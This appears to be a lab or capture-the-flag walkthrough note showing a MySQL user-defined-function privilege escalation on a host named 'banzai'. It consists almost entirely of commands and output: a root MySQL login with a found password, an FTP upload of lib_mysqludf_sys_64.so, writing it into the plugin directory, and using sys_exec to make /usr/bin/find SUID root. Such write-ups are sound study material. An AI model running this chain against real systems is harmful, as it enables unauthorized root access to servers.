www-data@banzai:/tmp$ mysql -u root -p
Enter password: EscalateRaftHubris123
# location where mysql expects its udf to be stored.
mysql> SHOW VARIABLES LIKE 'plugin_dir';
| Variable_name | Value |
| plugin_dir | /usr/lib/mysql/plugin/ |
1 row in set (0.00 sec)
# checking if database has been misconfigured to allow insecure handling of files.
mysql> SHOW VARIABLES LIKE "secure_file_priv";
| Variable_name | Value |
| secure_file_priv | |
1 row in set (0.00 sec)
Using https://gist.github.com/p0c/8587757
[OR] https://www.exploit-db.com/exploits/1518
# using ftp to upload
ftp> put lib_mysqludf_sys_64.so
local: lib_mysqludf_sys_64.so remote: lib_mysqludf_sys_64.so
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
8040 bytes sent in 0.00 secs (207.2308 MB/s)
ftp> chmod 777 lib_mysqludf_sys_64.so
200 SITE CHMOD command ok.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1001 1001 8040 Aug 30 16:49 lib_mysqludf_sys_64.so
226 Directory send OK.
# connect to mysql
use mysql;
create table kashz(line blob);
insert into kashz values(load_file('/var/www/html/lib_mysqludf_sys_64.so'));
select * from kashz into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
select sys_exec('chmod +s /usr/bin/find');
www-data@banzai:/var/www/html$ ls -la /usr/bin/find
-rwsr-sr-x 1 root root 221768 Feb 18 2017 /usr/bin/find